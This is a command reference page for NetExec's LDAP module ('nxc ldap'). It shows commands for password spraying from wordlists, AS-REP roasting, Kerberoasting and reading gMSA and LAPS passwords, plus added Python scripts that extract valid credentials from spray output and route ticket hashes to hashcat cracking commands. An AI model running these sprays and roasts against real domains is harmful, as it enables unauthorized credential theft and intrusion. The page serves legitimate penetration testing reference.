LinuxCommandLibrary

nxc-ldap

Enumerate and exploit LDAP services

TLDR

Search for valid domain credentials by trying out every combination in the specified lists of usernames and passwords

$ nxc ldap [192.168.178.2] [[-u|--username]] [path/to/usernames.txt] [[-p|--password]] [path/to/passwords.txt]

Enumerate active domain users
$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] [password] --active-users

Collect data about the targeted domain and import it into BloodHound automatically
$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] [password] --bloodhound [[-c|--collection]] [All]

Request an AS-REP for the specified user without authenticating (hence the empty password) in order to perform an AS-REP Roasting attack; this only yields a crackable hash if the account has Kerberos pre-authentication disabled
$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] '' --asreproast [path/to/output.txt]

Attempt to read the passwords of group Managed Service Accounts (gMSA); this only succeeds for accounts whose msDS-GroupMSAMembership allows the authenticated user to retrieve msDS-ManagedPassword
$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] [password] --gmsa
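A spray such as the first example above produces one status line per attempt, and the valid pairs have to be fished out of that output afterwards. The following is an added example, not part of NetExec: it assumes nxc's column layout (protocol, host, port, hostname, status tag, message), that successful logins are tagged "[+]", that administrative access is tagged "(Pwn3d!)", and that the message starts with DOMAIN\user:secret. The sample output is constructed, not captured from a real host.

```python
"""Pull valid credentials out of the console output of an nxc ldap spray.

Added example, not part of NetExec.  Assumed line layout:
    PROTO  HOST  PORT  HOSTNAME  [status]  DOMAIN\\user:secret [(Pwn3d!)]
SAMPLE below is constructed, not captured from a real host.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Column layout of a status line; the whitespace between columns is variable
LINE_RE = re.compile(
    r"^(?P<proto>LDAPS?|SMB)\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+"
    r"\[(?P<status>[+\-*!])\]\s*(?P<msg>.*)$"
)
# DOMAIN\user:secret, optionally followed by the admin marker
CRED_RE = re.compile(
    r"^(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<secret>.*?)(?:\s+\(Pwn3d!\))?\s*$"
)


@dataclass(frozen=True)
class ValidCred:
    host: str
    domain: str
    user: str
    secret: str  # password or NTLM hash, exactly as nxc echoed it
    admin: bool  # True when nxc flagged the login with "(Pwn3d!)"


def parse_nxc_output(text: str) -> list[ValidCred]:
    """Return the unique successful logins, in order of first appearance."""
    found: list[ValidCred] = []
    seen: set[tuple[str, str, str, str]] = set()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m or m.group("status") != "+":
            continue  # banners ([*]) and failures ([-]) carry no credential
        msg = m.group("msg")
        c = CRED_RE.match(msg)
        if not c:
            continue  # a "[+]" line that is not a login result
        key = (m.group("host"), c.group("domain").lower(), c.group("user").lower(), c.group("secret"))
        if key in seen:
            continue  # the same pair can appear twice when the input lists repeat it
        seen.add(key)
        found.append(ValidCred(*key, admin="(Pwn3d!)" in msg))
    return found


# Constructed sample output (not captured from a real host)
SAMPLE = """
LDAP        192.168.178.2   389    DC01             [*] Windows Server 2019 Build 17763 (name:DC01) (domain:corp.local)
LDAP        192.168.178.2   389    DC01             [-] corp.local\\bob:Winter2023 
LDAP        192.168.178.2   389    DC01             [+] corp.local\\alice:Winter2023
LDAP        192.168.178.2   389    DC01             [+] corp.local\\svc_backup:Backup!2023 (Pwn3d!)
LDAP        192.168.178.2   389    DC01             [-] corp.local\\carol:Winter2023
LDAP        192.168.178.2   389    DC01             [+] corp.local\\alice:Winter2023
"""

if __name__ == "__main__":
    for cred in parse_nxc_output(SAMPLE):
        print(f"{cred.domain}\\{cred.user}:{cred.secret}" + ("  [admin]" if cred.admin else ""))
```

Feed it the saved console output of a run with --continue-on-success; without that flag nxc stops at the first valid login and the parser will only ever return one entry.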

SYNOPSIS

nxc ldap TARGETS [OPTIONS]

TARGETS can be a single IP address, a comma-separated list of IPs, a CIDR range, a hostname, or a path to a file containing a list of targets.

PARAMETERS

--users
    Enumerate domain users.

--groups
    Enumerate domain groups.

--computers
    Enumerate domain computers.

--asreproast
    Attempts to perform AS-REP Roasting against eligible user accounts.

--kerberoast
    Attempts to perform Kerberoasting against eligible Service Principal Names (SPNs).

--gpp-passwords
    Not an ldap option. Group Policy Preferences (GPP) XML files with cpassword values live in SYSVOL and are retrieved over SMB with the gpp_password module (nxc smb TARGET -u USER -p PASS -M gpp_password).

--bloodhound
    Dumps data for ingestion into BloodHound for attack path analysis.

--laps
    Attempts to dump LAPS (Local Administrator Password Solution) passwords if permissions allow.

--rid-brute [MAX_RID]
    SMB option, not an ldap one (nxc smb TARGET --rid-brute): enumerates accounts by cycling RIDs through LSARPC lookups. Over LDAP, use --users with valid credentials instead.

-u USERNAME
    Specifies the username for authentication.

-p PASSWORD
    Specifies the password for authentication.

-H HASH
    Specifies an NTLM hash for pass-the-hash authentication.

-d DOMAIN
    Specifies the domain name for authentication.

--no-bruteforce
    When both -u and -p are given files, pair them line by line (first user with first password, second with second) instead of trying every user against every password.

--continue-on-success
    Keep trying the remaining credential combinations after the first valid login instead of stopping at the first success; use it to collect every valid pair during a spray.

--threads NUM
    Sets the number of concurrent threads to use for operations.
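The --asreproast and --kerberoast options write hashes to a file that then goes to a cracker, and the right hashcat mode depends on both the ticket type and the Kerberos encryption type encoded in the hash. The following is an added example, not NetExec code: it assumes nxc writes one hash per line in the common John/hashcat layouts ($krb5asrep$<etype>$user@REALM:... and $krb5tgs$<etype>$*user$REALM$spn*$...), tolerates the AES variants that use "$" as separator or omit the *spn* part, and routes each line to the hashcat mode for its type (18200/32100/32200 for AS-REP with etype 23/17/18, 13100/19600/19700 for TGS-REP). The hashes in SAMPLE_HASHES are constructed with dummy hex.

```python
"""Route the hashes written by `nxc ldap --asreproast` / `--kerberoast` to the
matching hashcat mode.

Added example, not part of NetExec.  Assumed line layouts:
    $krb5asrep$<etype>$user@REALM:<checksum>$<edata2>
    $krb5tgs$<etype>$*user$REALM$spn*$<checksum>$<edata2>
AES variants may use "$" in place of "@"/":" and may omit the *spn* part.
SAMPLE_HASHES is constructed with dummy hex, not real ticket material.
"""
from __future__ import annotations

import re

ASREP_RE = re.compile(r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)[@$](?P<realm>[^:$]+)[:$]")
TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$(?:(?P<spn>[^*$]*)\*\$)?"
)

# hashcat mode per (ticket kind, Kerberos encryption type).  etype 23 is RC4-HMAC,
# the cheap one to crack; 17/18 are AES128/AES256 and cost far more per guess.
HASHCAT_MODES = {
    ("asrep", 23): 18200,
    ("asrep", 17): 32100,
    ("asrep", 18): 32200,
    ("tgs", 23): 13100,
    ("tgs", 17): 19600,
    ("tgs", 18): 19700,
}


def classify(line: str) -> dict | None:
    """Identify one hash line; None for anything that is not a roast hash."""
    line = line.strip()
    m, kind = ASREP_RE.match(line), "asrep"
    if m is None:
        m, kind = TGS_RE.match(line), "tgs"
    if m is None:
        return None
    etype = int(m.group("etype"))
    return {
        "kind": kind,
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.groupdict().get("spn"),
        "mode": HASHCAT_MODES.get((kind, etype)),  # None when no mode is known for it
    }


def route_hashes(lines):
    """Group hash lines by hashcat mode; unrecognised lines go to `skipped`."""
    by_mode: dict[int, list[str]] = {}
    skipped: list[str] = []
    for line in lines:
        info = classify(line)
        if info is None or info["mode"] is None:
            skipped.append(line.strip())
            continue
        by_mode.setdefault(info["mode"], []).append(line.strip())
    return by_mode, skipped


def hashcat_commands(by_mode, wordlist: str = "rockyou.txt") -> list[str]:
    """One hashcat invocation per mode; roast_<mode>.txt is this script's own naming."""
    return [f"hashcat -a 0 -m {mode} roast_{mode}.txt {wordlist}" for mode in sorted(by_mode)]


# Constructed sample lines (dummy hex); the last one is a status line that can
# end up in the same file and must be ignored
SAMPLE_HASHES = [
    "$krb5asrep$23$svc_legacy@CORP.LOCAL:" + "ab" * 16 + "$" + "cd" * 40,
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$" + "ab" * 16 + "$" + "cd" * 40,
    "$krb5tgs$18$*svc_web$CORP.LOCAL$HTTP/web01.corp.local*$" + "ab" * 12 + "$" + "cd" * 40,
    "LDAP        192.168.178.2   389    DC01   [*] Total of records returned 3",
]

if __name__ == "__main__":
    by_mode, skipped = route_hashes(SAMPLE_HASHES)
    for mode, hashes in sorted(by_mode.items()):
        print(f"mode {mode}: {len(hashes)} hash(es)")
    for cmd in hashcat_commands(by_mode):
        print(cmd)
```

Splitting by mode matters in practice: an AES (etype 17/18) ticket mixed into an RC4 job is silently rejected by hashcat's parser, and a service account that only ever issues AES tickets is usually a sign that RC4 has been disabled for it, which changes how much cracking effort is realistic.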

DESCRIPTION

nxc-ldap is the ldap protocol of NetExec (formerly CrackMapExec, or CME), a post-exploitation framework for penetration testers. It talks LDAP (Lightweight Directory Access Protocol) to Active Directory domain controllers, letting assessors enumerate users, groups and computers, spot misconfigurations, and abuse them for credentials: accounts without Kerberos pre-authentication (AS-REP Roasting), user accounts that carry a servicePrincipalName (Kerberoasting), readable LAPS or gMSA passwords, and the like.

nxc-ldap supports reconnaissance, privilege escalation and lateral movement in Windows domains through authenticated and, for a few checks, unauthenticated LDAP queries, and it collapses much of the domain information gathering of an AD security assessment into single commands.
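The enumeration options (--users, --active-users, --asreproast, --kerberoast) differ only in the LDAP filter they apply, and most of that filtering is bit tests on userAccountControl. The following is an added example, not NetExec's own code: the filter strings are the standard Active Directory queries for these cases (1.2.840.113556.1.4.803 is the LDAP "bitwise AND" extensible-match rule; nxc's own filters may differ in detail), the predicates reproduce the same tests in Python, and ENTRIES is a constructed directory used to show which accounts each option would list.

```python
"""What the account selectors of nxc ldap actually test.

Added example, not NetExec code.  The filters are the standard AD queries for
these cases (1.2.840.113556.1.4.803 = LDAP_MATCHING_RULE_BIT_AND applied to
userAccountControl); nxc's own filter strings may differ in detail.
ENTRIES is a constructed directory, not data from a real domain.
"""
from __future__ import annotations

# userAccountControl flags that matter here
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304: Kerberos pre-auth not required

BIT_AND = "1.2.840.113556.1.4.803"  # OID of the "bitwise AND" matching rule

FILTERS = {
    "users": "(&(objectCategory=person)(objectClass=user))",
    "active_users": "(&(objectCategory=person)(objectClass=user)"
                    f"(!(userAccountControl:{BIT_AND}:={UF_ACCOUNTDISABLE})))",
    "asreproast": "(&(objectCategory=person)(objectClass=user)"
                  f"(userAccountControl:{BIT_AND}:={UF_DONT_REQUIRE_PREAUTH})"
                  f"(!(userAccountControl:{BIT_AND}:={UF_ACCOUNTDISABLE})))",
    # krbtgt carries an SPN but its ticket hash is not worth cracking, so it is excluded by name
    "kerberoast": "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)"
                  "(!(sAMAccountName=krbtgt))"
                  f"(!(userAccountControl:{BIT_AND}:={UF_ACCOUNTDISABLE})))",
}


def is_user(e: dict) -> bool:
    return e["objectCategory"] == "person"


def is_active_user(e: dict) -> bool:
    return is_user(e) and not (e["userAccountControl"] & UF_ACCOUNTDISABLE)


def is_asreproastable(e: dict) -> bool:
    return is_active_user(e) and bool(e["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


def is_kerberoastable(e: dict) -> bool:
    return (is_active_user(e) and bool(e.get("servicePrincipalName"))
            and e["sAMAccountName"] != "krbtgt")


SELECTORS = {
    "users": is_user,
    "active_users": is_active_user,
    "asreproast": is_asreproastable,
    "kerberoast": is_kerberoastable,
}


def select(entries, which: str) -> list[str]:
    """sAMAccountNames the given nxc option would list, sorted."""
    return sorted(e["sAMAccountName"] for e in entries if SELECTORS[which](e))


# Constructed directory: a plain user, a disabled user, a legacy service account
# without pre-auth, a disabled one, an SPN-bearing account, krbtgt and a DC
ENTRIES = [
    {"sAMAccountName": "alice", "objectCategory": "person", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "bob", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE},
    {"sAMAccountName": "svc_legacy", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "svc_old", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
    {"sAMAccountName": "svc_sql", "objectCategory": "person", "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "krbtgt", "objectCategory": "person",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "DC01$", "objectCategory": "computer", "userAccountControl": 0x82000,
     "servicePrincipalName": ["HOST/dc01.corp.local"]},
]

if __name__ == "__main__":
    for option in SELECTORS:
        print(f"--{option.replace('_', '-')}: {select(ENTRIES, option)}")
```

The disabled-account test is what separates --users from --active-users, and it is also why a spray built from --users output wastes attempts: disabled accounts can never log in, but each try still lands in the DC's logs.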

CAVEATS

  • Ethical Use: nxc-ldap is a powerful tool designed for authorized security assessments. Unauthorized use against any system is illegal and unethical.
  • Network Impact and Detection: sprays and enumeration generate bursts of traffic and of domain controller log events (failed logons, and for roasting, TGT/TGS requests for accounts that normally never see them), so expect IDS/IPS or SIEM alerts.
  • Permissions: Many advanced features (e.g., LAPS dumping, sensitive attribute enumeration) require specific elevated permissions within the Active Directory domain.
  • Dependency: Requires Python and the NetExec framework to be installed.

AUTHENTICATION METHODS

nxc-ldap accepts the same authentication methods as the other nxc protocols: username/password, NTLM hash (-H, pass-the-hash), Kerberos (-k, optionally with a ticket cache via --use-kcache), and unauthenticated access for the few operations that allow it (for example --asreproast with an empty password).

INTEGRATION WITH OTHER MODULES

While nxc-ldap focuses on LDAP, nxc itself is modular, allowing seamless integration with other protocols like SMB, WinRM, and RDP for a comprehensive assessment.

HISTORY

nxc (NetExec) is the successor to CrackMapExec (CME), a penetration testing tool originally written by @byt3bl33d3r. CME became a staple for enumerating and exploiting network services in Windows domains. When CME's development stalled, its maintainers continued the project as NetExec (nxc), keeping it a go-to tool for red teamers and pentesters. The ldap protocol has been part of the tool for years and keeps gaining enumeration checks and attack techniques relevant to Active Directory security.

SEE ALSO

ldapsearch(1), crackmapexec (n/a), impacket (n/a), bloodhound (n/a), secretsdump.py (n/a)
